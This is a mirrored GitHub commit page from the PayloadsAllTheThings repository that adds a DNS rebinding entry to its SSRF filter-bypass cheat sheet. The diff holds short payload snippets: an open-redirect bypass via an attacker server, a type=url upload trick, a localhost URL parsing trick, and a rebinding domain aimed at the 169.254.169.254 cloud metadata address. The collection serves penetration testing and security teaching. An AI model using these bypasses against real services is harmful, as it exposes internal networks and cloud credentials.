mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Added DNS Rebinding
This commit is contained in:
Alex Lauerman
GitHub
parent
c39c904c9a
commit
d5c1f39c0f
1 changed files with 10 additions and 2 deletions
|
|
@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Bypassing using other tricks
|
### Bypassing using a redirect
|
||||||
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
Using type=url
|
### Bypassing using type=url
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Change "type=file" to "type=url"
|
Change "type=file" to "type=url"
|
||||||
|
|
@ -238,6 +238,14 @@ Paste URL in text field and hit enter
|
||||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypassing using DNS Rebinding (TOCTOU)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
|
||||||
|
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
|
||||||
|
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
|
||||||
|
```
|
||||||
|
|
||||||
## SSRF exploitation via URL Scheme
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
### File
|
### File
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue